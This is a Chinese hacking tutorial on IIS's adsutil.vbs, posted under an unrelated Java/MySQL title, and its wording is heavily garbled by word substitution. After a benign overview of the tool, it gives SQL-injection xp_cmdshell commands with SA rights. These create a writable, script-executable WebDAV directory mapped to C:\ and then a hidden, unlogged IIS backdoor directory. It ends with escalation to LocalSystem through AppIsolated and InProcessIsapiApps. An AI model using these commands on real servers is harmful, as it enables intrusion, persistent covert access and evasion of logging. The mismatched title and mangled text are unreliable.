Java+MySql圖片數據保留與讀取的詳細實例。本站提示廣大學習愛好者:(Java+MySql圖片數據保留與讀取的詳細實例)文章只能為提供參考,不一定能成為您想要的結果。以下是Java+MySql圖片數據保留與讀取的詳細實例正文
1、簡略引見
adsutil.vbs是甚麼?信任用過IIS的網管員不會不曉得。這是IIS自帶的供給於敕令行下治理IIS的一個劇本。位於%SystemDrive%\Inetpub\AdminScripts目次下。足足有95,426 字節年夜小。這麼年夜的劇本一看就曉得功效壯大。現實也切實其實如斯。根本上我的感到它就是個敕令行下的“Internet 信息辦事治理器”。(現實上2000的辦事器上%SystemDrive%\Inetpub\AdminScripts下原有20多個vbs文件以供治理。而到了2003則只剩下adsutil.vbs一個了。足以解釋它的功效是何等龐雜)
提到adsutil.vbs就不能不提到MetaBase.bin。這個文件是IIS最主要的設置裝備擺設文件。一切對IIS的設置終究都邑貯存在這個文件中。IIS治理器和adsutil.vbs就是經由過程對這個文件讀取設置裝備擺設信息來顯示給用戶的。MetaBase.bin的貯存構造非常像注冊表,是一種樹型貯存構造。IIS治理器和adsutil.vbs經由過程一個Adspath的途徑來拜訪MetaBase.bin。途徑是由IIS:\開首,個中LocalHost表現當地辦事器,而w3svc表現IIS辦事。如IIS:\LocalHost/w3svc/1表現當地辦事器上的第一個web站點。IIS:\LocalHost/w3svc/1/root/Vdir表現第一個web站點根目次下的Vdir虛擬目次。
有了這些前置常識,上面再回到adsutil.vbs來看看它的用法吧:
C:\Inetpub\AdminScripts>cscript adsutil.vbs //別忘了鍵入cscript.exe這個劇本宿主文件名哦
Microsoft (R) Windows Script Host Version 5.6
版權一切(C) Microsoft Corporation 1996-2001。保存一切權力。
Usage:
ADSUTIL.VBS <cmd> [<path> [<value>]]
Description:
IIS administration utility that enables the configuration of metabase properties
.
Supported Commands: //支撐的敕令。這個最主要
GET, SET, ENUM, DELETE, CREATE, COPY,
APPCREATEINPROC, APPCREATEOUTPROC, APPCREATEPOOLPROC, APPDELETE, APPUNLOAD, AP
PGETSTATUS
Samples: //簡略的幾個例子
adsutil.vbs GET W3SVC/1/ServerBindings //檢查第一個虛擬web站點的邦定端口。這裡的W3SVC/1是IIS:\ LocalHostW3SVC/1的簡寫,而ServerBindings是他的屬性。下同。
adsutil.vbs SET W3SVC/1/ServerBindings ":81:" //設定第一個虛擬web站點的邦定端口為81。
adsutil.vbs CREATE W3SVC/1/Root/MyVdir "IIsWebVirtualDir" //在第一個虛擬web站點根目次下樹立一個MyVdir的虛擬目次。前面的"IIsWebVirtualDir"指的是目次類型。
adsutil.vbs START_SERVER W3SVC/1 //啟動第一個虛擬web站點。
adsutil.vbs ENUM /P W3SVC //檢查IIS的一切站點。
For Extended Help type:
adsutil.vbs HELP //假如想要進一步的檢查贊助,鍵入此敕令。我這裡就不轉了。避免有人說我賺稿費。年夜家可以本身看看。
以上“//”後的文字都是我添加上去的正文(下同)。信任如許應當可以看懂了吧年夜家。
我們所經常使用的adsutil.vbs的敕令有這麼幾個:GET, SET, ENUM, DELETE, CREATE。如今我來逐個解釋:
GET敕令平日是用來檢查目次的各項屬性值的。SET是用來設定目次屬性用的。ENUM也是用來檢查屬性。所分歧的是他直接把一切設置了的屬性直接全體顯示出來。平日一個目次就有好幾頁器械可看……他有個可選的“/p”開關符。加上了此開關的話。他只會列出此目次下的一切虛擬目次。DELETE敕令是用來刪除虛擬目次的。CREATE則是創立一個虛擬目次。別的還有幾個敕令:START_SERVER、STOP_SERVER、PAUSE_SERVER、CONTINUE _SERVER。分離是啟動、停滯、暫停、持續虛擬站點的運轉。
一個虛擬目次的年夜致屬性值以下(我只列出了能夠我們所經常使用的,不然會太長了):
KeyType : (STRING) "IIsWebVirtualDir" //目次類型,(STRING)解釋它是個字符串類型的屬性
AppRoot : (STRING) "/LM/W3SVC/1/ROOT" //目次IIS途徑
AppFriendlyName : (STRING) "默許運用法式" //運用法式名
AppIsolated : (INTEGER) 2 //指定運轉於過程外照樣過程中,數字類型屬性。
HttpCustomHeaders : (LIST) (1 Items) //自界說IIS數據頭
"Powered By : www.WoFeiWo.Info"
HttpErrors : (LIST) (42 Items) //各類IIS代碼所前往的頁面。可以自行設置。我這裡將會顯省略了。
DefaultDoc : (STRING) "Default.htm,index.htm,Default.asp,in
dex.asp,Default.php,index.php,Default.aspx,index.aspx" //目次的默許主頁面稱號。
Path : (STRING) "D:\ftp" //目次所真正映照的物理途徑
AccessFlags : (INTEGER) 513 //我也不曉得這是啥。橫豎沒設置過。似乎會主動設置的
AccessExecute : (BOOLEAN) False //目次的履行權限,是布爾值
AccessSource : (BOOLEAN) False //目次的Webdav拜訪能否許可
AccessRead : (BOOLEAN) True //目次的只讀權限
AccessWrite : (BOOLEAN) False //目次的寫權限
AccessScript : (BOOLEAN) True //目次能否許可履行劇本
AccessNoRemoteExecute : (BOOLEAN) False
AccessNoRemoteRead : (BOOLEAN) False
AccessNoRemoteWrite : (BOOLEAN) False
AccessNoRemoteScript : (BOOLEAN) False
AccessNoPhysicalDir : (BOOLEAN) False
ScriptMaps : (LIST) (27 Items) //運用法式擴大名映照
".asa,C:\WINDOWS\system32\inetsrv\asp.dll,5,GET,HEAD,POST,TRACE"
".asp,C:\WINDOWS\system32\inetsrv\asp.dll,5,GET,HEAD,POST,TRACE"
".aspx,C:\WINDOWS\Microsoft.NET\Framework\v1.1.4322\aspnet_isapi.dll,1,GET,HEA
D,POST,DEBUG"
……………… //這裡省略了n多半據
AspEnableParentPaths : (BOOLEAN) True
AppPoolId : (STRING) "DefaultAppPool" //運用法式池稱號
DontLog : (BOOLEAN) True //制止IISLog記載
DirBrowseFlags : (INTEGER) -1073741762
EnableDirBrowsing : (BOOLEAN) True //目次能否許可列目次
DirBrowseShowDate : (BOOLEAN) True //這裡及以下都是顯示目次時的參數設置。英文都很簡略。我也就不多說了。
DirBrowseShowTime : (BOOLEAN) True
DirBrowseShowSize : (BOOLEAN) True
DirBrowseShowExtension : (BOOLEAN) True
DirBrowseShowLongDate : (BOOLEAN) True
EnableDefaultDoc : (BOOLEAN) True //能否開啟默許主頁文檔
以上是我用cscript adsutil.vbs ENUM w3svc/1/root敕令在本身機械上觀察到的。年夜家也能夠本身輸出以上敕令研討。
下面的屬性我們都可以來經由過程SET敕令來停止設置。以下方法:
cscript adsutil.vbs SET w3svc/1/root/目次名/屬性名 設置值
如:cscript adsutil.vbs SET w3svc/1/root/wofeiwo/AccessRead 1 //設置第一個虛擬web站點下的wofeiwo虛擬目次的可讀權限為Ture
或:cscript adsutil.vbs SET w3svc/1/root/wofeiwo/Path “C:\” //設置目次的映照途徑是“C:\”
上面來看看我們的簡略應用的例子
2、adsutil.vbs的應用
(一)MSSQL Injection的上傳新思緒
也許年夜家會在MSSQL的注入中碰著這類情形:SA權限。可以履行Cmd敕令(xp_cmdshell、sp_OACreate、Job等等)。可是辦事器是在內網。裡面是個碉堡主機。只是做了個80端口的映照。3389開了沒有效(內網連不上啊),一切反向木馬也傳不上去(Tftp、Ftp、Wget、exe2bat等等)這時候候你該怎樣辦?
Amanl年夜哥經典的《搾干MSSQL最初一滴血》給我們一個很好的思緒:就是應用%SystemDrive%\Inetpub\AdminScripts下的vbs樹立一個新的虛擬目次。自界說其映照的相對途徑。如許可以繞過了對web相對途徑的猜解。然後經由過程BACKUP或MASKWEBTASK備份數據庫或暫時表到虛擬目次下(或是直接echo)便可以獲得了一個shell。
下面的設法主意切實其實很好。可是用過臭要飯的GetWebShell或小竹的NBUpFile的人都曉得BACKUP或MASKWEBTASK的勝利率有何等的低……而echo……我也不想說了。一行一行寫那的確是找罪受。(還要一直的轉特別字符……)
其實我們可以把Amanl年夜哥的設法主意改良一下。在我們樹立一個新的虛擬目次的時刻。可以加上寫目次的權限。再加上Webdav……那末我們不久可以直接經由過程IIS上傳任何文件了嗎?也不只僅局限於文本文件了。假如我們上傳了個反向後門在經由過程SA履行……呵呵,一切就都弄定了!
來,立時實施:
Exec Master..Xp_CmdShell ‘Cscript.exe %SystemDrive%\Inetpub\AdminScripts\ adsutil.vbs CREATE w3svc/1/Root/wofeiwo "IIsWebVirtualDir"';--
Exec Master..Xp_CmdShell ‘Cscript.exe %SystemDrive%\Inetpub\AdminScripts\ adsutil.vbs cscript adsutil.vbs SET w3svc/1/root/wofeiwo/Path “C:\”';--
留意下面的特別字符要本身改變。或許你可以用NBSI2或許巷子的SQLCOMM來履行以上敕令。
如許我們就在第一個web站點下樹立了一個wofeiwo的虛擬目次,映照到了C:根目次。我再給他加上讀和寫的權限,為了要一個webshell ,我再加上履行劇本的權限:
Exec Master..Xp_CmdShell ‘Cscript.exe %SystemDrive%\Inetpub\AdminScripts\ adsutil.vbs SET w3svc/1/Root/wofeiwo/AccessRead 1';--
Exec Master..Xp_CmdShell ‘Cscript.exe %SystemDrive%\Inetpub\AdminScripts\ adsutil.vbs SET w3svc/1/Root/wofeiwo/AccessWrite 1';--
Exec Master..Xp_CmdShell ‘Cscript.exe %SystemDrive%\Inetpub\AdminScripts\ adsutil.vbs SET w3svc/1/Root/wofeiwo/AccessScript 1';--
寫到這看過Surperhei《對IIS寫權限的應用》的同伙能夠會想要本身結構http包來上傳文件。其實有更簡略的辦法:
Exec Master..Xp_CmdShell ‘Cscript.exe %SystemDrive%\Inetpub\AdminScripts\ adsutil.vbs SET w3svc/1/Root/wofeiwo/EnableDirBrowsing 1';--
Exec Master..Xp_CmdShell ‘Cscript.exe %SystemDrive%\Inetpub\AdminScripts\ adsutil.vbs SET w3svc/1/Root/wofeiwo/AccessSource 1';--
設置為許可列目次和webdav拜訪,然後翻開你的IE,Ctrl+O翻開“翻開”對話框,鍵入你適才設置的虛擬目次。選中“以Web文件夾方法翻開”,肯定。如圖:
圖一
啊哈!看到一切的文件夾了嗎?如圖所示:
圖二
如今你便可以像操作通俗文件夾一樣操作以上文件了。還可以Ctrl+C、Ctrl+V復制文件呢。完成了便利上傳、修正文件的功效。
(二)更進一步
其實我們完整可以更進一步應用下面所說的思緒直接制造一個IIS後門。來,看我的完成!(這裡應用了動鲨在《近乎完善的IIS後門》中所引見的辦法。不外我是直接用adsutil.vbs這個MS自帶的對象完成了設置。對此文章感興致的同伙可以本身找來看看。)
Exec Master..Xp_CmdShell ‘Cscript.exe %SystemDrive%\Inetpub\AdminScripts\ adsutil.vbs CREATE w3svc/1/Root/wofeiwo "IIsWebVirtualDir"';-- //起首樹立一個wofeiwo目次。
Exec Master..Xp_CmdShell ‘Cscript.exe %SystemDrive%\Inetpub\AdminScripts\ adsutil.vbs CREATE w3svc/1/Root/wofeiwo/door "IIsWebVirtualDir"';-- //在wofeiwo目次下又樹立了一個door目次。
Exec Master..Xp_CmdShell ‘Cscript.exe %SystemDrive%\Inetpub\AdminScripts\ adsutil.vbs cscript adsutil.vbs SET w3svc/1/root/wofeiwo/door/Path “C:\”';-- //設置door目次映照到C:根目次。
Exec Master..Xp_CmdShell ‘Cscript.exe %SystemDrive%\Inetpub\AdminScripts\ adsutil.vbs SET w3svc/1/Root/wofeiwo/door/AccessRead 1';-- //這裡及以下都是給目次設置個種權限。可以參考以上的敕令正文。
Exec Master..Xp_CmdShell ‘Cscript.exe %SystemDrive%\Inetpub\AdminScripts\ adsutil.vbs SET w3svc/1/Root/wofeiwo/door/AccessWrite 1';--
Exec Master..Xp_CmdShell ‘Cscript.exe %SystemDrive%\Inetpub\AdminScripts\ adsutil.vbs SET w3svc/1/Root/wofeiwo/door/AccessScript 1';--
Exec Master..Xp_CmdShell ‘Cscript.exe %SystemDrive%\Inetpub\AdminScripts\ adsutil.vbs SET w3svc/1/Root/wofeiwo/door/DontLog 1';--
Exec Master..Xp_CmdShell ‘Cscript.exe %SystemDrive%\Inetpub\AdminScripts\ adsutil.vbs SET w3svc/1/Root/wofeiwo/door/EnableDirBrowsing 1';--
Exec Master..Xp_CmdShell ‘Cscript.exe %SystemDrive%\Inetpub\AdminScripts\ adsutil.vbs SET w3svc/1/Root/wofeiwo/door/AccessSource 1';--
Exec Master..Xp_CmdShell ‘Cscript.exe %SystemDrive%\Inetpub\AdminScripts\ adsutil.vbs SET w3svc/1/Root/wofeiwo/door/AccessExecute 1';--
能夠會有人說,甚麼阿。不就是和下面的一樣嗎?呵呵。其實你細心看。會發明我們下面新建的第一個目次“wofeiwo”並沒有設置“Path”屬性。也就是說他沒有映照就任何現實的目次上去。這裡運用了IIS的一個破綻(觸及到IIS5.0.1.0)。即關於沒有“Path”屬性的虛擬目次是不會在IIS治理器中湧現的。相當於一個隱蔽的目次。而其下的虛擬目次“door”異樣是因為下級目次弗成見的,所以它也是弗成見的!然則“door”目次是設置了“Path”屬性的。所以假如我們提交http://IP/wofeiwo/door/ 途徑。其成果是會前往C:下的文件目次。如今此目次曾經是我們可以隨意率性寫文件讀文件了。而且還可以轉到System32目次下對法式停止運轉。我們的後門雛形建成了。(留意看我這裡是加上了AccessExecute履行權限的)
然則我們如今履行的法式都照樣IIS默許的IUSR用戶的Guest權限。沒有年夜的權限我們老是不爽。上面來晉升我們的權限,加IUSR用戶為治理員就不說了。上面說說另兩個辦法:
1、設置AppIsolated,使此目次下法式在IIS的過程中停止。如許就繼續了IIS的System權限。
Exec Master..Xp_CmdShell ‘Cscript.exe %SystemDrive%\Inetpub\AdminScripts\ adsutil.vbs SET w3svc/1/Root/wofeiwo/door/ AppIsolated 0';--
2、 將解析asp文件的asp.dll參加到IIS的特權dll中。使得其在過程中運轉。從而的到IIS的LocalSystem權限。
1)起首獲得IIS一切的特權dll
Exec Master..Xp_CmdShell ‘Cscript.exe %SystemDrive%\Inetpub\AdminScripts\ adsutil.vbs GET w3svc/InProcessIsapiApps';--
前往:
InProcessIsapiApps : (LIST) (5 Items)
"C:\WINDOWS\system32\inetsrv\httpext.dll"
"C:\WINDOWS\system32\inetsrv\httpodbc.dll"
"C:\WINDOWS\system32\inetsrv\ssinc.dll"
"C:\WINDOWS\system32\msw3prt.dll"
"C:\WINDOWS\Microsoft.NET\Framework\v1.1.4322\aspnet_isapi.dll"
2) 將asp.dll設置到InProcessIsapiApps組中去,這裡要留意,把下面的一切查到的dll都加上,不然會被刪除。
Exec Master..Xp_CmdShell ‘Cscript.exe %SystemDrive%\Inetpub\AdminScripts\ adsutil.vbs SET w3svc/InProcessIsapiApps "C:\WINDOWS\system32\inetsrv\httpext.dll" "C:\WINDOWS\system32\inetsrv\httpodbc.dll" "C:\WINDOWS\system32\inetsrv\ssinc.dll" "C:\WINDOWS\system32\msw3prt.dll" "C:\WINDOWS\Microsoft.NET\Framework\v1.1.4322\aspnet_isapi.dll" "C:\WINDOWS\system32\inetsrv\asp.dll"';--
前往:
InProcessIsapiApps : (LIST) "C:\WINDOWS\system32\inetsrv\httpext.dll" "C:\WINDOWS\system32\inetsrv\httpodbc.dll" "C:\WINDOWS\system32\inetsrv\ssinc.dll" "C:\WINDOWS\system32\msw3prt.dll" "C:\WINDOWS\Microsoft.NET\Framework\v1.1.4322\aspnet_isapi.dll" "C:\WINDOWS\system32\inetsrv\asp.dll"
如許就設置好了。今後不管甚麼asp文件就都是 LoaclSystem權限了。經由過程以上的步調。我們的IIS後門根本上就是設置好了。你可以上傳asp木馬加以幫助掌握。如許的設置型後門是很難被治理員發明的。而且完整經由過程IIS的80端口通信。又沒有日記記載。所以相當平安。
3、結言
到這裡我關於adsutil.vbs的一點簡略運用就停止了。忽然發明文章曾經寫了那末多了。哇啊啊……文章寫得好累阿。因為自己是一菜鳥。文章不免有疏漏。還請年夜家多多指教。有甚麼疑問請和我接洽。我的郵箱:
[email protected]。或許年夜家可以到火狐技巧同盟http://www.wrsky.com來找我。我的ID:我非我。是服裝論壇t.vhao.net老手版的版主。